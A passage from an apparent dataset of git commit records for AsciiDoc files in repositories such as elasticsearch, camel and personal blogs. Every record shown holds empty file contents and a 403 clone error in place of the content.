/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,mohit\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_file":"docs\/reference\/ingest\/ingest-node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf586fc32ec593c31f09bb9b1ee81feec37e49c6","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa6a7e7ef210af2cf19bcd9c0bba9db713cade73","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 
2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbe6555b7abe4a36cea243d4d599f1355621752d","subject":"Docs: your -> you're (#20883)","message":"Docs: your -> you're (#20883)\n\n","repos":"vroyer\/elasticassandra,mohit\/elasticsearch,bawse\/elasticsearch,GlenRSmith\/elasticsearch,Shepard1212\/elasticsearch,Stacey-Gammon\/elasticsearch,ZTE-PaaS\/elasticsearch,nezirus\/elasticsearch,gmarz\/elasticsearch,qwerty4030\/elasticsearch,nezirus\/elasticsearch,scottsom\/elasticsearch,artnowo\/elasticsearch,spiegela\/elasticsearch,JackyMai\/elasticsearch,LewayneNaidoo\/elasticsearch,C-Bish\/elasticsearch,mjason3\/elasticsearch,coding0011\/elasticsearch,strapdata\/elassandra,i-am-Nathan\/elasticsearch,lks21c\/elasticsearch,artnowo\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,C-Bish\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,kalimatas\/elasticsearch,sneivandt\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,fred84\/elasticsearch,StefanGor\/elasticsearch,JervyShi\/elasticsearch,JervyShi\/elasticsearch,henakamaMSFT\/elasticsearch,strapdata\/elassandra,markwalkom\/elasticsearch,a2lin\/elasticsearch,fred84\/elasticsearch,masaruh\/elasticsearch,fernandozhu\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,StefanGor\/elasticsearch,winstonewert\/elasticsearch,Helen-Zhao\/elasticsearch,glefloch\/elasticsearch,maddin2016\/elasticsearch,uschindler\/elasticsearch,JSCooke\/elasticsearch,IanvsPoplicola\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,LeoYao\/elasticsearch,LewayneNaidoo\/elasticsearch,Helen-Zhao\/elasticsearch,spiegela\/elasticsearch,henakamaMSFT\/elasticsearch,mortonsykes\/elasticsearch,Stacey-Gammon\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,elasticdog\/elasticsearch,Shepard1212\/elasticsearch,wenpos\/elasticsearch,spiegela\/elasticsearch,glefloch\/elasticsearch,obourgain\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,jprante\/elasticsearch,fernandozhu\/elasticsearch,gmarz\/elasticsearch,rajanm\/elasticsearch,mikemccand\/elasticsearch,elasticdog\/elasticsearch,rlugojr\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,lks21c\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,fforbeck\/elasticsearch,wenpos\/elasticsearch,MisterAndersen\/elasticsearch,shreejay\/elasticsearch,strapdata\/elassandra,i-am-Nathan\/elasticsearch,jimczi\/elasticsearch,henakamaMSFT\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,IanvsPoplicola\/elasticsearch,scottsom\/elasticsearch,i-am-Nathan\/elasticsearch,MisterAndersen\/elasticsearch,Shepard1212\/elasticsearch,artnowo\/elasticsearch,JackyMai\/elasticsearch,robin13\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,s1monw\/elasticsearch,StefanGor\/elasticsearch,Helen-Zhao\/elasticsearch,obourgain\/elasticsearch,brandonkearby\/elasticsearch,ZTE-PaaS\/elasticsearch,robin13\/e
lasticsearch,mortonsykes\/elasticsearch,markwalkom\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,nilabhsagar\/elasticsearch,markwalkom\/elasticsearch,maddin2016\/elasticsearch,wenpos\/elasticsearch,liweinan0423\/elasticsearch,umeshdangat\/elasticsearch,MaineC\/elasticsearch,a2lin\/elasticsearch,njlawton\/elasticsearch,wenpos\/elasticsearch,naveenhooda2000\/elasticsearch,bawse\/elasticsearch,IanvsPoplicola\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,JervyShi\/elasticsearch,shreejay\/elasticsearch,lks21c\/elasticsearch,glefloch\/elasticsearch,Helen-Zhao\/elasticsearch,geidies\/elasticsearch,nazarewk\/elasticsearch,spiegela\/elasticsearch,obourgain\/elasticsearch,njlawton\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,gfyoung\/elasticsearch,JervyShi\/elasticsearch,Shepard1212\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,gfyoung\/elasticsearch,nezirus\/elasticsearch,a2lin\/elasticsearch,mikemccand\/elasticsearch,jimczi\/elasticsearch,wangtuo\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,winstonewert\/elasticsearch,ZTE-PaaS\/elasticsearch,qwerty4030\/elasticsearch,yanjunh\/elasticsearch,qwerty4030\/elasticsearch,JackyMai\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,obourgain\/elasticsearch,a2lin\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,liweinan0423\/elasticsearch,bawse\/elasticsearch,shreejay\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,nezirus\/elasticsearch,ZTE-PaaS\/elasticsearch,nknize\/elasticsearch,wuranbo\/elasticsearch,elasticdog\/elasticsearch,yanjunh\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,nazarewk\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,MisterAndersen\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,bawse\/elasticsearch,sneivandt\/elasticsearch,brandonkearby\/elasticsearch,s1monw\/elasticsearch,C-Bish\/elasticsearch,njlawton\/elasticsearch,ZTE-PaaS\/elasticsearch,henakamaMSFT\/elasticsearch,i-am-Nathan\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,wuranbo\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,wuranbo\/elasticsearch,Shepard1212\/elasticsearch,vroyer\/elassandra,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,gmarz\/elasticsearch,wangtuo\/elasticsearch,LewayneNaidoo\/elasticsearch,shreejay\/elasticsearch,yanjunh\/elasticsearch,MisterAndersen\/elasticsearch,robin13\/elasticsearch,JSCooke\/elasticsearch,JSCooke\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,liweinan0423\/elasticsearch,njlawton\/elasticsearch,fforbeck\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,fforbeck\/elasticsearch,JackyMai\/elasticsearch,coding0011\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,obourgain\/elasticsearch,vroyer\/elassandra,rlugojr\/elasticsearch,scottsom\/elasticsearch,mortonsykes\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,JackyMai\/elasticsearch,LewayneNaidoo\/elasticsearch,umeshdangat\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,gmarz\/elasticsearch,qwerty4030\/elasticsearch,HonzaKral\/elasticsearch,IanvsPoplicola\/elasticsearch,sne
ivandt\/elasticsearch,uschindler\/elasticsearch,mikemccand\/elasticsearch,jprante\/elasticsearch,jprante\/elasticsearch,StefanGor\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,bawse\/elasticsearch,markwalkom\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,fred84\/elasticsearch,scottsom\/elasticsearch,MisterAndersen\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,C-Bish\/elasticsearch,njlawton\/elasticsearch,StefanGor\/elasticsearch,MaineC\/elasticsearch,fernandozhu\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,mohit\/elasticsearch,i-am-Nathan\/elasticsearch,fred84\/elasticsearch,geidies\/elasticsearch,elasticdog\/elasticsearch,sneivandt\/elasticsearch,MaineC\/elasticsearch,nezirus\/elasticsearch,uschindler\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,MaineC\/elasticsearch,Stacey-Gammon\/elasticsearch,GlenRSmith\/elasticsearch,a2lin\/elasticsearch,strapdata\/elassandra,lks21c\/elasticsearch,Helen-Zhao\/elasticsearch,fred84\/elasticsearch,liweinan0423\/elasticsearch,mohit\/elasticsearch,yanjunh\/elasticsearch,vroyer\/elasticassandra,winstonewert\/elasticsearch,IanvsPoplicola\/elasticsearch,mjason3\/elasticsearch,rlugojr\/elasticsearch,wangtuo\/elasticsearch,alexshadow007\/elasticsearch,geidies\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,JSCooke\/elasticsearch,fernandozhu\/elasticsearch,gfyoung\/elasticsearch,liweinan0423\/elasticsearch,JervyShi\/elasticsearch,nilabhsagar\/elasticsearch,kalimatas\/elasticsearch,jprante\/elasticsearch,nazarewk\/elasticsearch,fforbeck\/elasticsearch,wuranbo\/elasticsearch,mikemccand\/elasticsearch,mohit\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,gmarz\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,nilabhsagar\/elasticsearch,nknize\/elasticsearch,fernandozhu\/elasticsearch,yanjunh\/elasticsearch,fforbeck\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,alexshadow007\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LewayneNaidoo\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,geidies\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,nilabhsagar\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,nazarewk\/elasticsearch,henakamaMSFT\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,wuranbo\/elasticsearch,vroyer\/elassandra,MaineC\/elasticsearch,rajanm\/elasticsearch,JervyShi\/elasticsearch,wangtuo\/elasticsearch,mortonsykes\/elasticsearch,rlugojr\/elasticsearch","old_file":"docs\/reference\/aggregations\/bucket\/children-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/children-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8e425951707fefb13a6ace267872acb6f1a545c1","subject":"y2b create post SMS Audio STREET by 50 DJ Headphones Unboxing \\u0026 Overview","message":"y2b create post SMS Audio STREET by 50 DJ Headphones Unboxing \\u0026 
Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-14-SMS-Audio-STREET-by-50-DJ-Headphones-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-02-14-SMS-Audio-STREET-by-50-DJ-Headphones-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"863aef49713db2d3a813bc33365498acfb7ae76c","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"390766513d9ee6fead357f1e309a9e094620cf38","subject":"Updating the documentation","message":"Updating the documentation\n\ngit-svn-id: 10bc45916fe30ae642aa5037c9a4b05727bba413@1849090 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"apache\/wss4j,apache\/wss4j","old_file":"src\/site\/asciidoc\/config.adoc","new_file":"src\/site\/asciidoc\/config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/wss4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f751cc726ae00cb78b8b81823de49b8409e0b713","subject":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Docker-for-Developers-be-ready-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebfadcaf98ebac495af55ff6c2bca1ef917dda6d","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5102570eff88a08e35b5fd918e76e8d0637a3a05","subject":"Update 2016-04-30-Concurrent-Map-of-Atomic-Integer-vs-Integer.adoc","message":"Update 
2016-04-30-Concurrent-Map-of-Atomic-Integer-vs-Integer.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2016-04-30-Concurrent-Map-of-Atomic-Integer-vs-Integer.adoc","new_file":"_posts\/2016-04-30-Concurrent-Map-of-Atomic-Integer-vs-Integer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09686289404ad79a4287daf17d0a0ac7f120314c","subject":"Update 2015-05-08-How-to-use-tomcat-8-Resources-in-serverxml.adoc","message":"Update 2015-05-08-How-to-use-tomcat-8-Resources-in-serverxml.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2015-05-08-How-to-use-tomcat-8-Resources-in-serverxml.adoc","new_file":"_posts\/2015-05-08-How-to-use-tomcat-8-Resources-in-serverxml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"556d4b1fda83f0dec733245afb3412fb7fa3793d","subject":"Update 2016-01-28-Angulartics-rewrite-with-Angular-2-support.adoc","message":"Update 2016-01-28-Angulartics-rewrite-with-Angular-2-support.adoc","repos":"timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io,timelf123\/timelf123.github.io","old_file":"_posts\/2016-01-28-Angulartics-rewrite-with-Angular-2-support.adoc","new_file":"_posts\/2016-01-28-Angulartics-rewrite-with-Angular-2-support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/timelf123\/timelf123.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00df8d998bc1e50952cbfcb03ebbf412b70be705","subject":"Converted to ascii doc","message":"Converted to ascii doc\n","repos":"skazi-pivotal\/Dev101,skazi-pivotal\/Dev101","old_file":"Labs\/lab_01.adoc","new_file":"Labs\/lab_01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skazi-pivotal\/Dev101.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8ccf5ffd1cc031b0ec8c47326140005a455450d","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfdac174eee22a259ff7951ec032439cb051e3fd","subject":"y2b create post This Tiny Gadget Will Change Your Voice!","message":"y2b create post This Tiny Gadget Will Change Your 
Voice!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-29-This-Tiny-Gadget-Will-Change-Your-Voice.adoc","new_file":"_posts\/2016-08-29-This-Tiny-Gadget-Will-Change-Your-Voice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2242fd5c716d4a6c3830d0f0bed1e6c83b2dba52","subject":"Proposed an editing workflow","message":"Proposed an editing workflow\n\nI have tried this process and it works well, but the original instruction set left a few too many questions.\r\nI've proposed a workflow that folks can use to continue using draw.io.","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/03_task_exportDrawIo.adoc","new_file":"src\/docs\/manual\/03_task_exportDrawIo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c4418bbc0bfb0e07f995f218bdf24f5d597c651b","subject":"Publish 2015-5-10-uGUI.adoc","message":"Publish 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ef74b276f16ae142c17998909d728fab17ddf99","subject":"Publish 2015-5-10-uGUI.adoc","message":"Publish 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"2015-5-10-uGUI.adoc","new_file":"2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e59f56068cb0f241c4a6015265a6aa5e2062e157","subject":"formating section titles","message":"formating section titles","repos":"RestComm\/documentation,RestComm\/documentation","old_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_file":"website\/src\/main\/asciidoc\/restcommone_cloud\/Quick Start Guide_RestcommONE Cloud.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RestComm\/documentation.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"bebe13720d0aad89852a5e3bd48037ba44299ec3","subject":"Update 2016-04-01-Macho-developers-Linus-wannabes-and-5yrs-old-egomaniac-bullies.adoc","message":"Update 
2016-04-01-Macho-developers-Linus-wannabes-and-5yrs-old-egomaniac-bullies.adoc","repos":"tkountis\/tkountis.github.io,tkountis\/tkountis.github.io,tkountis\/tkountis.github.io,tkountis\/tkountis.github.io","old_file":"_posts\/2016-04-01-Macho-developers-Linus-wannabes-and-5yrs-old-egomaniac-bullies.adoc","new_file":"_posts\/2016-04-01-Macho-developers-Linus-wannabes-and-5yrs-old-egomaniac-bullies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tkountis\/tkountis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f145596ce3d0513c99490787bef1f2efc966cf6","subject":"Update 2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","message":"Update 2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","new_file":"_posts\/2016-10-06-How-I-Cracked-My-First-Interview-The-Ten-Principles-I-Followed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00cd4635415b1c0233a0e68c7eecba9f3ec8dbc7","subject":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","message":"Update 2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_file":"_posts\/2016-11-04-Because-the-fall-of-art-tried-to-touch-p5js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d7ce68a3372599121f206fb3127e538f3b84b8a","subject":"Added camel-stringtemplate docs to Gitbook","message":"Added camel-stringtemplate docs to 
Gitbook\n","repos":"anoordover\/camel,Thopap\/camel,tkopczynski\/camel,gautric\/camel,drsquidop\/camel,mgyongyosi\/camel,drsquidop\/camel,ssharma\/camel,dmvolod\/camel,neoramon\/camel,akhettar\/camel,nicolaferraro\/camel,oalles\/camel,sabre1041\/camel,jamesnetherton\/camel,objectiser\/camel,dmvolod\/camel,lburgazzoli\/camel,DariusX\/camel,mgyongyosi\/camel,lburgazzoli\/camel,acartapanis\/camel,snurmine\/camel,sabre1041\/camel,yuruki\/camel,allancth\/camel,nikvaessen\/camel,hqstevenson\/camel,prashant2402\/camel,rmarting\/camel,davidkarlsen\/camel,yuruki\/camel,sverkera\/camel,gautric\/camel,mcollovati\/camel,nicolaferraro\/camel,punkhorn\/camel-upstream,FingolfinTEK\/camel,curso007\/camel,jmandawg\/camel,hqstevenson\/camel,RohanHart\/camel,kevinearls\/camel,gnodet\/camel,oalles\/camel,hqstevenson\/camel,jarst\/camel,YoshikiHigo\/camel,kevinearls\/camel,salikjan\/camel,lburgazzoli\/apache-camel,jmandawg\/camel,yuruki\/camel,veithen\/camel,tkopczynski\/camel,tdiesler\/camel,ullgren\/camel,isavin\/camel,cunningt\/camel,JYBESSON\/camel,akhettar\/camel,veithen\/camel,neoramon\/camel,RohanHart\/camel,drsquidop\/camel,tadayosi\/camel,isavin\/camel,neoramon\/camel,ssharma\/camel,nboukhed\/camel,kevinearls\/camel,NickCis\/camel,bgaudaen\/camel,gautric\/camel,nikvaessen\/camel,hqstevenson\/camel,ssharma\/camel,jlpedrosa\/camel,sirlatrom\/camel,Fabryprog\/camel,nboukhed\/camel,rmarting\/camel,kevinearls\/camel,kevinearls\/camel,objectiser\/camel,onders86\/camel,chirino\/camel,mgyongyosi\/camel,jamesnetherton\/camel,tadayosi\/camel,RohanHart\/camel,apache\/camel,pkletsko\/camel,bhaveshdt\/camel,nboukhed\/camel,veithen\/camel,nikhilvibhav\/camel,bhaveshdt\/camel,gautric\/camel,scranton\/camel,DariusX\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,tadayosi\/camel,sverkera\/camel,yuruki\/camel,allancth\/camel,gnodet\/camel,cunningt\/camel,acartapanis\/camel,w4tson\/camel,pkletsko\/camel,tlehoux\/camel,gautric\/camel,jlpedrosa\/camel,zregvart\/camel,jonmcewen\/camel,borcsokj\/camel,FingolfinTEK\/camel,DariusX\/camel,oalles\/camel,sverkera\/camel,objectiser\/camel,pmoerenhout\/camel,veithen\/camel,ullgren\/camel,gilfernandes\/camel,mgyongyosi\/camel,w4tson\/camel,scranton\/camel,christophd\/camel,onders86\/camel,anton-k11\/camel,hqstevenson\/camel,tlehoux\/camel,zregvart\/camel,nikvaessen\/camel,anoordover\/camel,lburgazzoli\/camel,adessaigne\/camel,bhaveshdt\/camel,jmandawg\/camel,tdiesler\/camel,apache\/camel,rmarting\/camel,adessaigne\/camel,jmandawg\/camel,bhaveshdt\/camel,nikvaessen\/camel,Fabryprog\/camel,dmvolod\/camel,kevinearls\/camel,davidkarlsen\/camel,pmoerenhout\/camel,jarst\/camel,NickCis\/camel,onders86\/camel,jonmcewen\/camel,sirlatrom\/camel,driseley\/camel,tlehoux\/camel,tdiesler\/camel,ssharma\/camel,tkopczynski\/camel,snurmine\/camel,christophd\/camel,jmandawg\/camel,prashant2402\/camel,pkletsko\/camel,gilfernandes\/camel,anton-k11\/camel,Thopap\/camel,jamesnetherton\/camel,hqstevenson\/camel,borcsokj\/camel,davidkarlsen\/camel,JYBESSON\/camel,bgaudaen\/camel,RohanHart\/camel,cunningt\/camel,bhaveshdt\/camel,FingolfinTEK\/camel,christophd\/camel,alvinkwekel\/camel,jmandawg\/camel,mgyongyosi\/camel,ssharma\/camel,nboukhed\/camel,prashant2402\/camel,curso007\/camel,scranton\/camel,driseley\/camel,snurmine\/camel,yuruki\/camel,driseley\/camel,YoshikiHigo\/camel,jamesnetherton\/camel,bgaudaen\/camel,nboukhed\/camel,scranton\/camel,chirino\/camel,drsquidop\/camel,pmoerenhout\/camel,jlpedrosa\/camel,a